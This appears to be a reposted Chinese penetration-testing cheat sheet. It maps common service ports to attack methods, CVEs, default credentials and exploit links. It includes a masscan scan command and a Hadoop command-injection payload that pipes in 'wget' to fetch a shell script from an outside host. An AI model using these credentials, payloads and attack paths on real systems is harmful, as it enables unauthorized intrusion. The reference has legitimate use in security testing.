常见端口漏洞利用
Posted Pggcute
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了常见端口漏洞利用相关的知识,希望对你有一定的参考价值。
常见端口漏洞利用
快速扫描:Masscan -p80,800 ip --rate=10000
21/ FTP
匿名/暴力破解
拒绝服务
22/ SSH
暴力破解
23/ telnet
Winbox(cve-2018-14847)
为什么需要telnet?
telnet就是查看某个端口是否可访问。我们在搞开发的时候,经常要用的端口就是 8080。那么你可以启动服务器,用telnet 去查看这个端口是否可用。
25/ SMTP
邮件伪造
161/ snmp
弱口令
https://blog.csdn.net/archersaber39/article/details/78932252
389/ ladp
匿名访问
https://www.cnblogs.com/persuit/p/5706432.html
ladp注入
http://www.4hou.com/technology/9090.html
https://www.freebuf.com/articles/web/149059.html
443/ ssl
openssl心脏出血
https://paper.seebug.org/437/
http://www.anquan.us/static/drops/papers-1381.html
https://www.freebuf.com/sectool/33191.html
445/ smb
win10拒绝服务
永恒之蓝RCE
875/ rsync
匿名访问
http://www.anquan.us/static/bugs/wooyun-2016-0190815.html
https://paper.seebug.org/409/
http://www.91ri.org/11093.html
1433/ mssql
暴力破解
http://www.anquan.us/static/drops/tips-12749. html
https://www.seebug.org/appdir/Microsoft%20SQL%20Server
1521/ oracle
暴力破解
https://www.exploit-db.com/exploits/33084
2601/ zebra
http://www.anquan.us/static/bugs/wooyun-2013-047409.html
3128/ squid
3306/ mysql
RCE
http://www.91ri.org/17511.html
CVE-2015-0411
hash破解
https://www.freebuf.com/column/153561.html
waf绕过
https://www.freebuf.com/articles/web/155570.html
general_log_file getshell
https://www.freebuf.com/column/143125.html
提权
http://www.91ri.org/16540.html
3312/ kangle
getshell
https://www.secpulse.com/archives/23927.html
3389/ rdp
shift 放大镜 输入法绕过 guest用户
永恒之蓝(ESTEEMAUDIT)
https://www.freebuf.com/articles/system/132171.html
https://www.anquanke.com/post/id/86328
ms12-020
https://blog.csdn.net/meyo_leo/article/details/77950552
4440/ rundeck
https://www.secpulse.com/archives/29500.html
4848/ glassfish
文件读取
https://www.secpulse.com/archives/42277.html
https://www.anquanke.com/post/id/85948
GlassFish2/ admin:admin
GlassFish3,4/ 如果管理员不设置帐号本地会自动登录,远程访问会提示配置错误
5432/ PostgreSQL
RCE
https://www.cnblogs.com/KevinGeorge/p/8521496.html
https://www.secpulse.com/archives/69153.html
默认账号postgres
参考
http://www.91ri.org/13070.html
http://www.91ri.org/6507.html
5672,15672,4369,25672/ RabbitMQ
(guest/guest)
5900/ VNC
https://www.seebug.org/appdir/RealVNC
5984/ CouchDB
http://xxx:5984/_utils/
6082/ varnish
CLI 未授权
https://www.secpulse.com/archives/10681.html
6379/ redis
Redis
未授权
ssh publickey
crontab
webshell
反序列化
开机自启文件夹写bat
参考https://www.freebuf.com/column/170710.html
7001,7002/ WebLogic
默认弱口令
weblogic/weblogic ,weblogic/welcom ,weblogic/welcom1,weblogic1/weblogic
反序列
CVE-2018-2628
https://www.freebuf.com/articles/web/169770.html
https://www.seebug.org/appdir/WebLogic
9200,9300/ elasticsearch
CVE-2015-1427
http://www.anquan.us/static/drops/papers-5142.html
CVE-2018-17246
https://www.seebug.org/vuldb/ssvid-97730
参考
https://www.seebug.org/search/?keywords=elasticsearch
9000/ fcgi
https://paper.seebug.org/289/
9043/ WebSphere
Websphere8.5
https://localhost:9043/ibm/console/logon.jsp
Websphere6-7
http://localhost:9043/ibm/console
后台未授权,登录后可部署WAR包
SOAP服务有反序列化
弱口令:admin /password
11211/ memcache
未授权
UDP反射
https://shockerli.net/post/memcached-udp-reflection-attack-bug/
27017,27018/ Mongodb
未授权
注入
https://www.anquanke.com/post/id/83763
phpMoAdmin RCE
https://www.aqniu.com/threat-alert/6978.html
50000/ SAP
SAP命令执行
https://www.secpulse.com/archives/20204.html
50070,50030/ hadoop
未授权
https://www.freebuf.com/vuls/173638.html
命令执行
host:50060/pstack?pid=123|wget http://somehost/shell.sh
https://www.seebug.org/search/?keywords=hadoop
其他
http://www.91ri.org/15441.html
以上是关于常见端口漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章